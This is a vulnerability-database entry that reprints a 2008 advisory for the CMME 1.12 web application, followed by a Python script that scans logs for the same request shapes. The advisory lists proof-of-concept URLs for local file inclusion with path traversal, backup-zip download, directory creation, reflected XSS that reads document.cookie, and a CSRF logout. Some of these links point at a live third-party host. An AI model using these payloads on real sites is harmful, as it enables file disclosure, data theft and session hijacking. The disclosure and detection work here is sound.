Vendor: CMME
By: SirGod
CVSS: 7.5 (HIGH)
Vulnerability types: Local File Inclusion, Download Backup, Make Directory, Cross Site Scripting, Cross Site Request Forgery
CWE: 79, 352, 434, 89, 352
Product Name: CMME
Affected Version From: 1.12
Affected Version To: 1.12
Patch Exists: NO
Related CWE: N/A
CPE: a:cmme:cmme:1.12
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

CMME 1.12 (LFI/XSS/CSRF/Download Backup/MkDir) Multiple Remote Vulnerabilities

CMME 1.12 is vulnerable to Local File Inclusion, Download Backup, Make Directory, Cross Site Scripting and Cross Site Request Forgery. Each of these can be exploited by sending a maliciously crafted HTTP request with a specially crafted parameter value.

Mitigation:

To mitigate Local File Inclusion, Download Backup, Make Directory, Cross Site Scripting and Cross Site Request Forgery, the user should ensure that all input is validated and sanitized before being used. The user should also ensure that all web applications are up to date with the latest security patches.

Exploit-DB raw data:

##################################################################################################################
[+] CMME 1.12 (LFI/XSS/CSRF/Download Backup/MkDir) Multiple Remote Vulnerabilities 
[+] Discovered By SirGod                        
[+] www.mortal-team.org                        
[+] Greetz : E.M.I.N.E.M,Ras,Puscas_marin,ToxicBlood,MesSiAH,xZu,HrN,kemrayz
##################################################################################################################

[+] Local File Inclusion

    Note : magic_quotes_gpc must be off.
 
    Example :

     http://localhost/index.php?page=weblog&env=[Local File]%00

    PoC :

     http://localhost/index.php?page=weblog&env=../../../autoexec.bat%00
    

[+] Download Backup

     Example 1:

       http://localhost/backup/[Backup Name].zip

     PoC 1:

       http://localhost/backup/cmme_data.zip

     Live Demo 1:

       http://cmme.oesterholt.net/backup/cmme_data.zip

     Example 2:

       http://localhost/backup/[Backup Name].zip

     PoC 2:

       http://localhost/backup/cmme_cmme.zip

     Live Demo 2:

       http://cmme.oesterholt.net/backup/cmme_cmme.zip

      
[+] Make Directory

    You can make multiple directories in the website root folder.

      Example 1:
     
        http://localhost/admin.php?action=login&page=home&script=index.php&env=[Directory]

      PoC 1:

        http://localhost/admin.php?action=login&page=home&script=index.php&env=!!!Owned!!!


    Or you can make a dir in the previous directory, etc.

      Example 2:

        http://localhost/admin.php?action=login&page=home&script=index.php&env=../[Directory]

      PoC 2:

        http://localhost/admin.php?action=login&page=home&script=index.php&env=../!!!Owned!!!


[+] Cross Site Scripting  

     Example 1:
     
      http://localhost/statistics.php?action=hstat_year&page=[XSS]&env=data

     PoC 1:

      http://localhost/statistics.php?action=hstat_year&page=<script>alert(document.cookie)</script>&env=data

     Live Demo 1:

      http://cmme.oesterholt.net/statistics.php?action=hstat_year&page=<script>alert(document.cookie)</script>&env=data

     Example 2:

      http://localhost/statistics.php?action=hstat_year&year=[XSS]&env=data

     PoC 2:

      http://localhost/statistics.php?action=hstat_year&year=<script>alert(document.cookie)</script>&env=data

     Live Demo 2:
     
      http://cmme.oesterholt.net/statistics.php?action=hstat_year&year=<script>alert(document.cookie)</script>&env=data


[+] Cross Site Request Forgery

    If a logged-in user with administrator privileges clicks the following link, he will be logged out.

      http://localhost/admin.php?action=logout&page=home&env=data


##################################################################################################################

# milw0rm.com [2008-08-26]
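
One way to flag the request shapes listed in this advisory when reviewing web-server logs, as an added example that is not part of the original advisory or of CMME. It assumes `data` is the only legitimate `env` value and that the site is served as `localhost`; the label names and sample requests are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

KNOWN_ENVS = {"data"}    # assumption: the only env value the page shows in normal use
SITE_HOST = "localhost"  # assumption: host name the site is served under
BACKUP_RE = re.compile(r"^/backup/[^/]+\.zip$", re.IGNORECASE)
MARKUP_RE = re.compile(r"[<>\"']")

def classify(target, referer=""):
    """Return sorted finding labels for one logged request target and Referer."""
    url = urlsplit(target)
    params = {k: v[-1] for k, v in parse_qs(url.query).items()}  # URL-decoded values
    script = url.path.rsplit("/", 1)[-1].lower()
    found = set()
    if BACKUP_RE.match(url.path):
        found.add("backup-download")
    env = params.get("env")
    if env is not None and env not in KNOWN_ENVS:
        # Same parameter, different effect depending on the script that receives it.
        found.add({"index.php": "lfi-env", "admin.php": "mkdir-env"}.get(script, "env-unknown"))
        if ".." in env or "\x00" in env:
            found.add("env-traversal")
    if script == "statistics.php":
        for name in ("page", "year"):
            if MARKUP_RE.search(params.get(name, "")):
                found.add("xss-" + name)
    if script == "admin.php" and params.get("action") == "logout":
        ref_host = urlsplit(referer).hostname
        if ref_host and ref_host != SITE_HOST:  # logout triggered from another site
            found.add("csrf-logout")
    return sorted(found)

# Constructed sample requests (target, Referer) modelled on the advisory's URL shapes.
SAMPLES = [
    ("/statistics.php?action=hstat_year&year=2008&env=data", ""),
    ("/index.php?page=weblog&env=../../../autoexec.bat%00", ""),
    ("/backup/cmme_data.zip", ""),
    ("/admin.php?action=login&page=home&script=index.php&env=..%2Fnewdir", ""),
    ("/statistics.php?action=hstat_year&year=%3Cscript%3Ealert(1)%3C/script%3E&env=data", ""),
    ("/admin.php?action=logout&page=home&env=data", "http://forum.example/thread"),
    ("/admin.php?action=logout&page=home&env=data", "http://localhost/admin.php"),
]

def scan(samples):
    """Return (target, findings) pairs for flagged requests; clean ones are omitted."""
    return [(t, f) for t, r in samples if (f := classify(t, r))]

if __name__ == "__main__":
    for target, findings in scan(SAMPLES):
        print(", ".join(findings), "<-", target)
```

The same allow-list and character checks can be applied server-side before `env`, `page` and `year` are used, which is the input validation the mitigation paragraph calls for.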